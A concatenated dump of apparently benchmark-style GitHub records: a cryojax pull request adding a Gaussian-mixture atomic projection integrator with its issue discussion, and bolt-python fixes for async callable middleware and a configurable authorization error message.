-_rlnMicrographName #6
-_rlnOpticsGroup #7
-_rlnCtfMaxResolution #8
-_rlnCtfFigureOfMerit #9
-_rlnDefocusU #10
-_rlnDefocusV #11
-_rlnDefocusAngle #12
-_rlnCtfBfactor #13
-_rlnCtfScalefactor #14
-_rlnPhaseShift #15
- 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
-
+loop_
+_rlnCoordinateX #1
+_rlnCoordinateY #2
+_rlnAnglePsi #3
+_rlnAutopickFigureOfMerit #4
+_rlnImageName #5
+_rlnMicrographName #6
+_rlnOpticsGroup #7
+_rlnCtfMaxResolution #8
+_rlnCtfFigureOfMerit #9
+_rlnDefocusU #10
+_rlnDefocusV #11
+_rlnDefocusAngle #12
+_rlnCtfBfactor #13
+_rlnCtfScalefactor #14
+_rlnPhaseShift #15
+ 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
diff --git a/src/cryojax/image/_map_coordinates.py b/src/cryojax/image/_map_coordinates.py
index e81da9d1..71f618da 100644
--- a/src/cryojax/image/_map_coordinates.py
+++ b/src/cryojax/image/_map_coordinates.py
@@ -97,8 +97,9 @@ def _map_coordinates_nn_or_linear(
if len(coordinates) != input_arr.ndim:
raise ValueError(
- "coordinates must be a sequence of length input.ndim, but "
- "{} != {}".format(len(coordinates), input_arr.ndim)
+ "coordinates must be a sequence of length input.ndim, but " "{} != {}".format(
+ len(coordinates), input_arr.ndim
+ )
)
if order == 0:
diff --git a/src/cryojax/io/_gemmi.py b/src/cryojax/io/_gemmi.py
index 97eb3ec8..0391bd4a 100644
--- a/src/cryojax/io/_gemmi.py
+++ b/src/cryojax/io/_gemmi.py
@@ -48,11 +48,26 @@ def clean_gemmi_structure(structure):
Same object, cleaned up of unnecessary atoms.
"""
- structure.remove_alternative_conformations()
- structure.remove_hydrogens()
- structure.remove_waters()
- structure.remove_ligands_and_waters()
- structure.remove_empty_chains()
+ try:
+ structure.remove_alternative_conformations()
+ except RuntimeError:
+ Warning("Alternative conformations could not be removed.")
+ try:
+ structure.remove_hydrogens()
+ except RuntimeError:
+ Warning("Hydrogens could not be removed.")
+ try:
+ structure.remove_waters()
+ except RuntimeError:
+ Warning("Waters could not be removed.")
+ try:
+ structure.remove_ligands_and_waters()
+ except RuntimeError:
+ Warning("Ligands and waters could not be removed.")
+ try:
+ structure.remove_empty_chains()
+ except RuntimeError:
+ Warning("Empty chains could not be removed.")
return structure
@@ -142,7 +157,7 @@ def extract_atom_positions_and_numbers(
return positions, atomic_numbers
-def extract_atom_b_factors(atoms) -> Float[np.ndarray, "N 3"]:
+def extract_atom_b_factors(atoms) -> Float[np.ndarray, " N"]:
"""
Interpret Gemmi atoms and extract a single parameter type.
diff --git a/src/cryojax/simulator/__init__.py b/src/cryojax/simulator/__init__.py
index 39c4d137..39c270c1 100644
--- a/src/cryojax/simulator/__init__.py
+++ b/src/cryojax/simulator/__init__.py
@@ -30,6 +30,7 @@
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
FourierSliceExtraction as FourierSliceExtraction,
+ GaussianMixtureProjection as GaussianMixtureProjection,
NufftProjection as NufftProjection,
)
from ._potential_representation import (
diff --git a/src/cryojax/simulator/_potential_integrator/__init__.py b/src/cryojax/simulator/_potential_integrator/__init__.py
index c1067e68..6085fa52 100644
--- a/src/cryojax/simulator/_potential_integrator/__init__.py
+++ b/src/cryojax/simulator/_potential_integrator/__init__.py
@@ -1,3 +1,6 @@
+from .atom_potential_integrator import (
+ GaussianMixtureProjection as GaussianMixtureProjection,
+)
from .base_potential_integrator import (
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
diff --git a/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
new file mode 100644
index 00000000..fe128430
--- /dev/null
+++ b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
@@ -0,0 +1,146 @@
+from typing import Optional
+from typing_extensions import override
+
+import jax
+import jax.numpy as jnp
+from jaxtyping import Array, Complex, Float
+
+from ...coordinates._make_coordinate_grids import _make_coordinates_or_frequencies_1d
+from ...image import downsample_with_fourier_cropping, rfftn
+from .._instrument_config import InstrumentConfig
+from .._potential_representation import (
+ GaussianMixtureAtomicPotential,
+ PengAtomicPotential,
+)
+from .base_potential_integrator import AbstractPotentialIntegrator
+
+
+class GaussianMixtureProjection(
+ AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential],
+ strict=True,
+):
+ upsampling_factor: Optional[float | int]
+
+ def __init__(
+ self,
+ *,
+ upsampling_factor: float | int = 1,
+ ):
+ """**Arguments:**
+ `upsampling_factor`: The factor by which to upsample the computation of the images. If `upsampling_factor` is greater than 1, the images will be computed at a higher resolution and then downsampled to the original resolution. This can be useful for reducing aliasing artifacts in the images.
+ """ # noqa: E501
+ self.upsampling_factor = upsampling_factor
+
+ @override
+ def compute_fourier_integrated_potential(
+ self,
+ potential: GaussianMixtureAtomicPotential | PengAtomicPotential,
+ instrument_config: InstrumentConfig,
+ ) -> Complex[
+ Array, "{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}"
+ ]:
+ """Compute a projection from the atomic potential and transform it to Fourier space
+
+ **Arguments:**
+ - `potential`: The atomic potential to project.
+ - `instrument_config`: The configuration of the imaging instrument.
+
+ **Returns:**
+ The Fourier transform of the integrated potential.
+ """ # noqa: E501
+
+ pixel_size = instrument_config.pixel_size / self.upsampling_factor
+ shape = (
+ instrument_config.padded_y_dim * self.upsampling_factor,
+ instrument_config.padded_x_dim * self.upsampling_factor,
+ )
+
+ grid_x = _make_coordinates_or_frequencies_1d(
+ shape[1], pixel_size, real_space=True
+ )
+ grid_y = _make_coordinates_or_frequencies_1d(
+ shape[0], pixel_size, real_space=True
+ )
+
+ if isinstance(potential, PengAtomicPotential):
+ if potential.b_factors is None:
+ gaussian_widths = potential.scattering_factor_b
+ else:
+ gaussian_widths = (
+ potential.scattering_factor_b + potential.b_factors[:, None]
+ )
+
+ gaussian_amplitudes = potential.scattering_factor_a
+
+ elif isinstance(potential, GaussianMixtureAtomicPotential):
+ gaussian_amplitudes = potential.gaussian_strengths
+ gaussian_widths = potential.gaussian_widths
+
+ else:
+ raise ValueError(
+ "Supported types for `potential` are `PengAtomicPotential` and "
+ " `GaussianMixtureAtomicPotential`."
+ )
+
+ projection = _evaluate_2d_real_space_gaussian(
+ grid_x,
+ grid_y,
+ potential.atom_positions,
+ gaussian_amplitudes,
+ gaussian_widths,
+ )
+
+ if self.upsampling_factor > 1:
+ projection = downsample_with_fourier_cropping(
+ projection, self.upsampling_factor
+ )
+ # Go to fourier space in cryojax's conventions
+ return rfftn(projection)
+
+
[email protected]
+def _evaluate_2d_real_space_gaussian(
+ grid_x: Float[Array, " x_dim"],
+ grid_y: Float[Array, " y_dim"],
+ atom_positions: Float[Array, "n_atoms 3"],
+ a: Float[Array, "n_atoms n_gaussians_per_atom"],
+ b: Float[Array, "n_atoms n_gaussians_per_atom"],
+) -> Float[Array, "y_dim x_dim"]:
+ """Evaluate a gaussian on a 3D grid.
+
+ **Arguments:**
+
+ - `grid_x`: The x-coordinates of the grid.
+ - `grid_y`: The y-coordinates of the grid.
+ - `pos`: The center of the gaussian.
+ - `a`: A scale factor.
+ - `b`: The scale of the gaussian.
+
+ **Returns:**
+
+ The potential of the gaussian on the grid.
+ """
+
+ b_inverse = 4.0 * jnp.pi / b
+
+ gauss_x = (
+ jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_x[:, None] - atom_positions.T[0, :]) ** 2)[:, :, None]
+ )
+ * a[None, :, :]
+ * b_inverse[None, :, :]
+ )
+ gauss_y = jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_y[:, None] - atom_positions.T[1, :]) ** 2)[:, :, None]
+ )
+
+ gauss_x = jnp.transpose(gauss_x, (2, 1, 0))
+ gauss_y = jnp.transpose(gauss_y, (2, 0, 1))
+
+ image = 4 * jnp.pi * jnp.sum(jnp.matmul(gauss_y, gauss_x), axis=0)
+
+ return image
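The projection kernel in this new file evaluates each atom's 2D Gaussian as an outer product of 1D factors along x and y, then sums over atoms with a matmul. A minimal NumPy sketch of that separability trick (a hypothetical one-atom example with made-up positions and widths, not cryojax's exact normalization):

```python
import numpy as np

# Hypothetical small example: one atom, one Gaussian per atom.
grid_x = np.linspace(-2.0, 2.0, 5)
grid_y = np.linspace(-2.0, 2.0, 4)
x0, y0 = 0.5, -0.5   # assumed atom position
b_inv = 1.3          # assumed inverse-width factor

# 1D Gaussian factors along each axis
gx = np.exp(-np.pi * b_inv * (grid_x - x0) ** 2)   # shape (5,)
gy = np.exp(-np.pi * b_inv * (grid_y - y0) ** 2)   # shape (4,)

# Separable evaluation: outer product of the 1D factors...
separable = np.outer(gy, gx)                       # shape (4, 5)

# ...matches the direct 2D evaluation on the full mesh grid,
# because exp(-a*dx^2) * exp(-a*dy^2) == exp(-a*(dx^2 + dy^2)).
X, Y = np.meshgrid(grid_x, grid_y)
direct = np.exp(-np.pi * b_inv * ((X - x0) ** 2 + (Y - y0) ** 2))

print(np.allclose(separable, direct))  # True
```

The payoff is cost: the separable form evaluates O(nx + ny) exponentials per atom instead of O(nx * ny).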
| Implement integrator that simulates an image from an atom potential directly
| In order to do this, we would just have to make a subclass of the `cryojax.simulator.AbstractPotentialIntegrator`, and then we could write something like
```python
from typing_extensions import override
from jaxtyping import Array, Complex
from cryojax.image import rfftn
class GaussianMixtureProjection(AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential], strict=True):
def __init__(...):
# Initialize any parameters for the algorithm we want to be able to tune
@override
def compute_fourier_integrated_potential(potential: GaussianMixtureAtomicPotential | PengAtomicPotential, instrument_config: InstrumentConfig) -> Complex[Array, '{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}']:
# Grab information from the `instrument_config` like the `instrument_config.pixel_size` and
# `instrument_config.padded_shape` and do some things
...
# Compute the projection in real space, assuming that the `potential` is already at the rotation
# we want
projection = ...
# Go to fourier space in cryojax's conventions
return rfftn(projection)
```
Then this should work with everything in cryojax!
A few implementation points
- Maybe the `__init__` should take in a parameter that specifies how much to upsample the image? Then we can do fourier cropping before returning the image. This would be a candidate for something that would belong in an abstract base class (but it wouldn’t be necessary to do this)
- We should analytically work out the projection integral, starting with the expression in the docs for `PengAtomicPotential.as_real_voxel_grid`. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
> We should analytically work out the projection integral, starting with the expression in the docs for PengAtomicPotential.as_real_voxel_grid. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
It simply changes the b^(3/2) to b
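For reference, that prefactor change follows from a single 1D Gaussian integral (a sketch assuming the $(4\pi/b)^{3/2}$ real-space prefactor convention referenced above; the exact constants in cryojax may differ):

$$\int_{-\infty}^{\infty} e^{-4\pi^2 z^2 / b}\,dz = \sqrt{\frac{b}{4\pi}},$$

so integrating the 3D term along $z$ gives

$$\left(\frac{4\pi}{b}\right)^{3/2} e^{-4\pi^2\lvert\mathbf{r}-\mathbf{r}_0\rvert^2/b} \;\longrightarrow\; \frac{4\pi}{b}\, e^{-4\pi^2\left((x-x_0)^2+(y-y_0)^2\right)/b},$$

i.e. the $b^{3/2}$ in the prefactor denominator becomes $b$.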
Ah of course that’s right! | 2024-05-17T17:42:41 | 0.0 | [] | [] |
||
slackapi/bolt-python | slackapi__bolt-python-1132 | 40f6d1e46cdf8f958ad682c9ae0aeb73d27ce616 | diff --git a/slack_bolt/app/async_app.py b/slack_bolt/app/async_app.py
index 7e984c5d9..89a5124a3 100644
--- a/slack_bolt/app/async_app.py
+++ b/slack_bolt/app/async_app.py
@@ -24,7 +24,7 @@
AsyncMessageListenerMatches,
)
from slack_bolt.oauth.async_internals import select_consistent_installation_store
-from slack_bolt.util.utils import get_name_for_callable
+from slack_bolt.util.utils import get_name_for_callable, is_coroutine_function
from slack_bolt.workflows.step.async_step import (
AsyncWorkflowStep,
AsyncWorkflowStepBuilder,
@@ -778,7 +778,7 @@ async def custom_error_handler(error, body, logger):
func: The function that is supposed to be executed
when getting an unhandled error in Bolt app.
"""
- if not inspect.iscoroutinefunction(func):
+ if not is_coroutine_function(func):
name = get_name_for_callable(func)
raise BoltError(error_listener_function_must_be_coro_func(name))
self._async_listener_runner.listener_error_handler = AsyncCustomListenerErrorHandler(
@@ -1410,7 +1410,7 @@ def _register_listener(
value_to_return = functions[0]
for func in functions:
- if not inspect.iscoroutinefunction(func):
+ if not is_coroutine_function(func):
name = get_name_for_callable(func)
raise BoltError(error_listener_function_must_be_coro_func(name))
@@ -1422,7 +1422,7 @@ def _register_listener(
for m in middleware or []:
if isinstance(m, AsyncMiddleware):
listener_middleware.append(m)
- elif isinstance(m, Callable) and inspect.iscoroutinefunction(m):
+ elif isinstance(m, Callable) and is_coroutine_function(m):
listener_middleware.append(AsyncCustomMiddleware(app_name=self.name, func=m, base_logger=self._base_logger))
else:
raise ValueError(error_unexpected_listener_middleware(type(m)))
diff --git a/slack_bolt/middleware/async_custom_middleware.py b/slack_bolt/middleware/async_custom_middleware.py
index e2060b75c..a8f2a0f9d 100644
--- a/slack_bolt/middleware/async_custom_middleware.py
+++ b/slack_bolt/middleware/async_custom_middleware.py
@@ -1,4 +1,3 @@
-import inspect
from logging import Logger
from typing import Callable, Awaitable, Any, Sequence, Optional
@@ -7,7 +6,7 @@
from slack_bolt.request.async_request import AsyncBoltRequest
from slack_bolt.response import BoltResponse
from .async_middleware import AsyncMiddleware
-from slack_bolt.util.utils import get_name_for_callable, get_arg_names_of_callable
+from slack_bolt.util.utils import get_name_for_callable, get_arg_names_of_callable, is_coroutine_function
class AsyncCustomMiddleware(AsyncMiddleware):
@@ -24,7 +23,7 @@ def __init__(
base_logger: Optional[Logger] = None,
):
self.app_name = app_name
- if inspect.iscoroutinefunction(func):
+ if is_coroutine_function(func):
self.func = func
else:
raise ValueError("Async middleware function must be an async function")
diff --git a/slack_bolt/util/utils.py b/slack_bolt/util/utils.py
index efb815399..a5bcdbe5f 100644
--- a/slack_bolt/util/utils.py
+++ b/slack_bolt/util/utils.py
@@ -88,3 +88,9 @@ def get_name_for_callable(func: Callable) -> str:
def get_arg_names_of_callable(func: Callable) -> List[str]:
return inspect.getfullargspec(inspect.unwrap(func)).args
+
+
+def is_coroutine_function(func: Optional[Any]) -> bool:
+ return func is not None and (
+ inspect.iscoroutinefunction(func) or (hasattr(func, "__call__") and inspect.iscoroutinefunction(func.__call__))
+ )
| A class with async "__call__" method fails to work as a middleware
(Filling out the following details about bugs will help us solve your issue sooner.)
### Reproducible in:
```bash
pip freeze | grep slack
python --version
sw_vers && uname -v # or `ver`
```
#### The `slack_bolt` version
```bash
slack-bolt==1.18.1
slack_sdk==3.31.0
```
#### Python runtime version
```bash
Python 3.11.9
```
#### OS info
```bash
bash: sw_vers: command not found
❯ uname -a
Linux 49d1cffcb728 6.8.4-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 4 20:45:21 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
```
#### Steps to reproduce:
(Share the commands to run, source code, and project settings (e.g., setup.py))
```python
from slack_bolt.app.async_app import AsyncApp
class MyCallableMiddleware:
async def __call__(self, next_) -> None:
await next_()
app = AsyncApp()
app.middleware(MyCallableMiddleware()) # this raises `ValueError: Async middleware function must be an async function`
```
### Expected result:
`AsyncApp.middleware` accepts _any_ `Callable[..., Awaitable[Any]]` object, per signature.
### Actual result:
The middleware instance pass the callable check here
https://github.com/slackapi/bolt-python/blob/main/slack_bolt/app/async_app.py#L678
and is thus sent to `AsyncCustomMiddleware` init here
https://github.com/slackapi/bolt-python/blob/main/slack_bolt/middleware/async_custom_middleware.py#L13
where the signature for `func` is `Callable[..., Awaitable[Any]]` (which my middleware instance is).
However, `inspect.iscoroutinefunction` is used to check `func`, which _does not pass_, as it checks for the existence of
the `CO_COROUTINE` flag (see here: [CPython source](https://github.com/python/cpython/blob/v3.11.9/Lib/inspect.py#L414)),
despite the instance being both callable and asynchronous.
## Requirements
Please read the [Contributing guidelines](https://github.com/slackapi/bolt-python/blob/main/.github/contributing.md) and [Code of Conduct](https://slackhq.github.io/code-of-conduct) before creating this issue or pull request. By submitting, you are agreeing to those rules.
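The `inspect` behavior described above can be reproduced in a few lines, independent of Bolt:

```python
import inspect

class MyCallableMiddleware:
    # The instance is awaitable when called, but the instance object
    # itself carries no CO_COROUTINE code flag.
    async def __call__(self, next_) -> None:
        await next_()

m = MyCallableMiddleware()

# The naive check on the instance fails...
print(inspect.iscoroutinefunction(m))           # False

# ...while the bound __call__ method passes, which is what the
# is_coroutine_function helper in the fix falls back to checking.
print(inspect.iscoroutinefunction(m.__call__))  # True
```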
Hi @chet-manley, thanks for reporting this issue. The built-in inspect library's behaviour is a bit surprising, but it seems this scenario should be supported. I found a workaround on the bolt-python side, so I will come up with a pull request resolving it. Once it's merged, we will release a new patch release fixing the issue.
| 2024-08-21T07:26:30 | 0.0 | [] | []
||
slackapi/bolt-python | slackapi__bolt-python-1077 | e5131c9b9ccd5be58926df254356c5ca3159c147 | diff --git a/slack_bolt/app/app.py b/slack_bolt/app/app.py
index d01163636..a2e4f3aca 100644
--- a/slack_bolt/app/app.py
+++ b/slack_bolt/app/app.py
@@ -103,6 +103,7 @@ def __init__(
# for multi-workspace apps
before_authorize: Optional[Union[Middleware, Callable[..., Any]]] = None,
authorize: Optional[Callable[..., AuthorizeResult]] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
installation_store: Optional[InstallationStore] = None,
# for either only bot scope usage or v1.0.x compatibility
installation_store_bot_only: Optional[bool] = None,
@@ -159,6 +160,8 @@ def message_hello(message, say):
before_authorize: A global middleware that can be executed right before authorize function
authorize: The function to authorize an incoming request from Slack
by checking if there is a team/user in the installation data.
+ user_facing_authorize_error_message: The user-facing error message to display
+ when the app is installed but the installation is not managed by this app's installation store
installation_store: The module offering save/find operations of installation data
installation_store_bot_only: Use `InstallationStore#find_bot()` if True (Default: False)
request_verification_enabled: False if you would like to disable the built-in middleware (Default: True).
@@ -178,7 +181,7 @@ def message_hello(message, say):
`SslCheck` is a built-in middleware that handles ssl_check requests from Slack.
oauth_settings: The settings related to Slack app installation flow (OAuth flow)
oauth_flow: Instantiated `slack_bolt.oauth.OAuthFlow`. This is always prioritized over oauth_settings.
- verification_token: Deprecated verification mechanism. This can used only for ssl_check requests.
+ verification_token: Deprecated verification mechanism. This can be used only for ssl_check requests.
listener_executor: Custom executor to run background tasks. If absent, the default `ThreadPoolExecutor` will
be used.
"""
@@ -348,6 +351,7 @@ def message_hello(message, say):
ignoring_self_events_enabled=ignoring_self_events_enabled,
ssl_check_enabled=ssl_check_enabled,
url_verification_enabled=url_verification_enabled,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
def _init_middleware_list(
@@ -357,6 +361,7 @@ def _init_middleware_list(
ignoring_self_events_enabled: bool = True,
ssl_check_enabled: bool = True,
url_verification_enabled: bool = True,
+ user_facing_authorize_error_message: Optional[str] = None,
):
if self._init_middleware_list_done:
return
@@ -385,13 +390,18 @@ def _init_middleware_list(
SingleTeamAuthorization(
auth_test_result=auth_test_result,
base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
)
except SlackApiError as err:
raise BoltError(error_auth_test_failure(err.response))
elif self._authorize is not None:
self._middleware_list.append(
- MultiTeamsAuthorization(authorize=self._authorize, base_logger=self._base_logger)
+ MultiTeamsAuthorization(
+ authorize=self._authorize,
+ base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
+ )
)
else:
raise BoltError(error_token_required())
@@ -401,6 +411,7 @@ def _init_middleware_list(
authorize=self._authorize,
base_logger=self._base_logger,
user_token_resolution=self._oauth_flow.settings.user_token_resolution,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
)
if ignoring_self_events_enabled is True:
diff --git a/slack_bolt/app/async_app.py b/slack_bolt/app/async_app.py
index c70fc2e54..6f3366a19 100644
--- a/slack_bolt/app/async_app.py
+++ b/slack_bolt/app/async_app.py
@@ -114,6 +114,7 @@ def __init__(
# for multi-workspace apps
before_authorize: Optional[Union[AsyncMiddleware, Callable[..., Awaitable[Any]]]] = None,
authorize: Optional[Callable[..., Awaitable[AuthorizeResult]]] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
installation_store: Optional[AsyncInstallationStore] = None,
# for either only bot scope usage or v1.0.x compatibility
installation_store_bot_only: Optional[bool] = None,
@@ -167,6 +168,8 @@ async def message_hello(message, say): # async function
before_authorize: A global middleware that can be executed right before authorize function
authorize: The function to authorize an incoming request from Slack
by checking if there is a team/user in the installation data.
+ user_facing_authorize_error_message: The user-facing error message to display
+ when the app is installed but the installation is not managed by this app's installation store
installation_store: The module offering save/find operations of installation data
installation_store_bot_only: Use `AsyncInstallationStore#async_find_bot()` if True (Default: False)
request_verification_enabled: False if you would like to disable the built-in middleware (Default: True).
@@ -354,6 +357,7 @@ async def message_hello(message, say): # async function
ignoring_self_events_enabled=ignoring_self_events_enabled,
ssl_check_enabled=ssl_check_enabled,
url_verification_enabled=url_verification_enabled,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
self._server: Optional[AsyncSlackAppServer] = None
@@ -364,6 +368,7 @@ def _init_async_middleware_list(
ignoring_self_events_enabled: bool = True,
ssl_check_enabled: bool = True,
url_verification_enabled: bool = True,
+ user_facing_authorize_error_message: Optional[str] = None,
):
if self._init_middleware_list_done:
return
@@ -383,10 +388,19 @@ def _init_async_middleware_list(
# As authorize is required for making a Bolt app function, we don't offer the flag to disable this
if self._async_oauth_flow is None:
if self._token:
- self._async_middleware_list.append(AsyncSingleTeamAuthorization(base_logger=self._base_logger))
+ self._async_middleware_list.append(
+ AsyncSingleTeamAuthorization(
+ base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
+ )
+ )
elif self._async_authorize is not None:
self._async_middleware_list.append(
- AsyncMultiTeamsAuthorization(authorize=self._async_authorize, base_logger=self._base_logger)
+ AsyncMultiTeamsAuthorization(
+ authorize=self._async_authorize,
+ base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
+ )
)
else:
raise BoltError(error_token_required())
@@ -396,6 +410,7 @@ def _init_async_middleware_list(
authorize=self._async_authorize,
base_logger=self._base_logger,
user_token_resolution=self._async_oauth_flow.settings.user_token_resolution,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
)
diff --git a/slack_bolt/middleware/authorization/async_internals.py b/slack_bolt/middleware/authorization/async_internals.py
index e465d50d2..b5d8264ca 100644
--- a/slack_bolt/middleware/authorization/async_internals.py
+++ b/slack_bolt/middleware/authorization/async_internals.py
@@ -1,4 +1,3 @@
-from slack_bolt.middleware.authorization.internals import _build_error_text
from slack_bolt.request.async_request import AsyncBoltRequest
from slack_bolt.response import BoltResponse
@@ -15,9 +14,9 @@ def _is_no_auth_required(req: AsyncBoltRequest) -> bool:
return _is_url_verification(req) or _is_ssl_check(req)
-def _build_error_response() -> BoltResponse:
+def _build_user_facing_error_response(message: str) -> BoltResponse:
# show an ephemeral message to the end-user
return BoltResponse(
status=200,
- body=_build_error_text(),
+ body=message,
)
diff --git a/slack_bolt/middleware/authorization/async_multi_teams_authorization.py b/slack_bolt/middleware/authorization/async_multi_teams_authorization.py
index 3a89f0f2b..cbb38bc2f 100644
--- a/slack_bolt/middleware/authorization/async_multi_teams_authorization.py
+++ b/slack_bolt/middleware/authorization/async_multi_teams_authorization.py
@@ -6,8 +6,8 @@
from slack_bolt.request.async_request import AsyncBoltRequest
from slack_bolt.response import BoltResponse
from .async_authorization import AsyncAuthorization
-from .async_internals import _build_error_response, _is_no_auth_required
-from .internals import _is_no_auth_test_call_required, _build_error_text
+from .async_internals import _build_user_facing_error_response, _is_no_auth_required
+from .internals import _is_no_auth_test_call_required, _build_user_facing_authorize_error_message
from ...authorization import AuthorizeResult
from ...authorization.async_authorize import AsyncAuthorize
@@ -21,6 +21,7 @@ def __init__(
authorize: AsyncAuthorize,
base_logger: Optional[Logger] = None,
user_token_resolution: str = "authed_user",
+ user_facing_authorize_error_message: Optional[str] = None,
):
"""Multi-workspace authorization.
@@ -28,10 +29,14 @@ def __init__(
authorize: The function to authorize incoming requests from Slack.
base_logger: The base logger
user_token_resolution: "authed_user" or "actor"
+ user_facing_authorize_error_message: The user-facing error message when installation is not found
"""
self.authorize = authorize
self.logger = get_bolt_logger(AsyncMultiTeamsAuthorization, base_logger=base_logger)
self.user_token_resolution = user_token_resolution
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
async def async_process(
self,
@@ -92,10 +97,10 @@ async def async_process(
"the AuthorizeResult (returned value from authorize) for it was not found."
)
if req.context.response_url is not None:
- await req.context.respond(_build_error_text())
+ await req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
diff --git a/slack_bolt/middleware/authorization/async_single_team_authorization.py b/slack_bolt/middleware/authorization/async_single_team_authorization.py
index 8d3555a0e..695e17144 100644
--- a/slack_bolt/middleware/authorization/async_single_team_authorization.py
+++ b/slack_bolt/middleware/authorization/async_single_team_authorization.py
@@ -7,16 +7,23 @@
from slack_bolt.response import BoltResponse
from slack_sdk.web.async_slack_response import AsyncSlackResponse
from slack_sdk.errors import SlackApiError
-from .async_internals import _build_error_response, _is_no_auth_required
-from .internals import _to_authorize_result, _is_no_auth_test_call_required, _build_error_text
+from .async_internals import _build_user_facing_error_response, _is_no_auth_required
+from .internals import _to_authorize_result, _is_no_auth_test_call_required, _build_user_facing_authorize_error_message
from ...authorization import AuthorizeResult
class AsyncSingleTeamAuthorization(AsyncAuthorization):
- def __init__(self, base_logger: Optional[Logger] = None):
+ def __init__(
+ self,
+ base_logger: Optional[Logger] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
+ ):
"""Single-workspace authorization."""
self.auth_test_result: Optional[AsyncSlackResponse] = None
self.logger = get_bolt_logger(AsyncSingleTeamAuthorization, base_logger=base_logger)
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
async def async_process(
self,
@@ -58,9 +65,9 @@ async def async_process(
# Just in case
self.logger.error("auth.test API call result is unexpectedly None")
if req.context.response_url is not None:
- await req.context.respond(_build_error_text())
+ await req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
diff --git a/slack_bolt/middleware/authorization/internals.py b/slack_bolt/middleware/authorization/internals.py
index af264854b..814101953 100644
--- a/slack_bolt/middleware/authorization/internals.py
+++ b/slack_bolt/middleware/authorization/internals.py
@@ -43,18 +43,18 @@ def _is_no_auth_test_call_required(req: Union[BoltRequest, "AsyncBoltRequest"])
return _is_no_auth_test_events(req)
-def _build_error_text() -> str:
+def _build_user_facing_authorize_error_message() -> str:
return (
